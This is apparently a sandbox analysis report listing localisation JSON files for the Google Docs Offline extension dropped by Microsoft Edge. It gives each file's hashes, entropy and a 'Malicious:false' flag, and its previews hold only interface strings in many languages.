                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1719
                                                                                                                                                                                    Entropy (8bit):4.287702203591075
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                    MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                    SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                    SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                    SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):936
                                                                                                                                                                                    Entropy (8bit):4.457879437756106
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                    MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                    SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                    SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                    SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3830
                                                                                                                                                                                    Entropy (8bit):3.5483353063347587
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                    MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                    SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                    SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                    SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1898
                                                                                                                                                                                    Entropy (8bit):4.187050294267571
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                    MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                    SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                    SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                    SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                    Entropy (8bit):4.513485418448461
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                    MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                    SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                    SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                    SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):851
                                                                                                                                                                                    Entropy (8bit):4.4858053753176526
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                    MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                    SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                    SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                    SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):878
                                                                                                                                                                                    Entropy (8bit):4.4541485835627475
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                    MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                    SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                    SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                    SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2766
                                                                                                                                                                                    Entropy (8bit):3.839730779948262
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                    MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                    SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                    SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                    SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):978
                                                                                                                                                                                    Entropy (8bit):4.879137540019932
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                    MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                    SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                    SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                    SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):907
                                                                                                                                                                                    Entropy (8bit):4.599411354657937
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                    MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                    SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                    SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                    SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):914
                                                                                                                                                                                    Entropy (8bit):4.604761241355716
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                    MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                    SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                    SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                    SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):937
                                                                                                                                                                                    Entropy (8bit):4.686555713975264
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                    MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                    SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                    SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                    SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1337
                                                                                                                                                                                    Entropy (8bit):4.69531415794894
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                    MD5:51D34FE303D0C90EE409A2397FCA437D
                                                                                                                                                                                    SHA1:B4B9A7B19C62D0AA95D1F10640A5FBA628CCCA12
                                                                                                                                                                                    SHA-256:BE733625ACD03158103D62BC0EEF272CA3F265AC30C87A6A03467481A177DAE3
                                                                                                                                                                                    SHA-512:E8670DED44DC6EE30E5F41C8B2040CF8A463CD9A60FC31FA70EB1D4C9AC1A3558369792B5B86FA761A21F5266D5A35E5C2C39297F367DAA84159585C19EC492A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{.. "createnew": {.. "message": ".......".. },.. "explanationofflinedisabled": {.. "message": "..... ............ Google ......... ... ........., ............ . .... . ......... ............. . ......-...... . .......... .. ......... .........".. },.. "explanationofflineenabled": {.. "message": "... ........... . .......... .. ...... ......... ..... ..... . ............. .., . ....... ........ ......-.......".. },.. "extdesc": {.. "message": ".........., .............. . ............ ........., ....... . ........... ... ....... . ..........".. },.. "extname": {.. "message": "Google.......... ......".. },.. "learnmore": {.
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2846
                                                                                                                                                                                    Entropy (8bit):3.7416822879702547
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:YWi+htQTKEQb3aXQYJLSWy7sTQThQTnQtQTrEmQ6kiLsegQSJFwsQGaiPn779I+S:zhiTK5b3tUGVjTGTnQiTryOLpyaxYf/S
                                                                                                                                                                                    MD5:B8A4FD612534A171A9A03C1984BB4BDD
                                                                                                                                                                                    SHA1:F513F7300827FE352E8ECB5BD4BB1729F3A0E22A
                                                                                                                                                                                    SHA-256:54241EBE651A8344235CC47AFD274C080ABAEBC8C3A25AFB95D8373B6A5670A2
                                                                                                                                                                                    SHA-512:C03E35BFDE546AEB3245024EF721E7E606327581EFE9EAF8C5B11989D9033BDB58437041A5CB6D567BAA05466B6AAF054C47F976FD940EEEDF69FDF80D79095B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:{"createnew":{"message":"\u0db1\u0dc0 \u0dbd\u0dda\u0d9b\u0db1\u0dba\u0d9a\u0dca \u0dc3\u0dcf\u0daf\u0db1\u0dca\u0db1"},"explanationofflinedisabled":{"message":"\u0d94\u0db6 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2\u0dba. \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd \u0dc3\u0db8\u0dca\u0db6\u0db1\u0dca\u0db0\u0dad\u0dcf\u0dc0\u0d9a\u0dca \u0db1\u0ddc\u0db8\u0dd0\u0dad\u0dd2\u0dc0 Google Docs \u0db7\u0dcf\u0dc0\u0dd2\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8\u0da7, Google Docs \u0db8\u0dd4\u0dbd\u0dca \u0db4\u0dd2\u0da7\u0dd4\u0dc0 \u0db8\u0dad \u0dc3\u0dd0\u0d9a\u0dc3\u0dd3\u0db8\u0dca \u0dc0\u0dd9\u0dad \u0d9c\u0ddc\u0dc3\u0dca \u0d94\u0db6 \u0d8a\u0dc5\u0d9f \u0d85\u0dc0\u0dc3\u0dca\u0dae\u0dcf\u0dc0\u0dda \u0d85\u0db1\u0dca\u0dad\u0dbb\u0dca\u0da2\u0dcf\u0dbd\u0dba\u0da7 \u0dc3\u0db6\u0dd0\u0db3\u0dd2 \u0dc0\u0dd2\u0da7 \u0db1\u0ddc\u0db6\u0dd0\u0db3\u0dd2 \u0dc3\u0db8\u0db8\u0dd4\u0dc4\u0dd4\u0dbb\u0dca\u0dad \u0d9a\u0dd2\u0dbb\u0dd3\u0db8 \u0d9a\u0dca\u200d\u0dbb\u0dd2\u0dba\u0dc
                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):934
                                                                                                                                                                                    Entropy (8bit):4.882122893545996
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:1HAF8pMv1RS4LXL22IUjdh8uJwpPqLDEtxKLhSS:hyv1RS4LXx38u36QsS
                                                                                                                                                                                    MD5:8E55817BF7A87052F11FE554A61C52D5
                                                                                                                                                                                    SHA1:9ABDC0725FE27967F6F6BE0DF5D6C46E2957F455
                                                                                                                                                                                    SHA-256:903060EC9E76040B46DEB47BBB041D0B28A6816CB9B892D7342FC7DC6782F87C
                                                                                                                                                                                    SHA-512:EFF9EC7E72B272DDE5F29123653BC056A4BC2C3C662AE3C448F8CB6A4D1865A0679B7E74C1B3189F3E262109ED6BC8F8D2BDE14AEFC8E87E0F785AE4837D01C7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
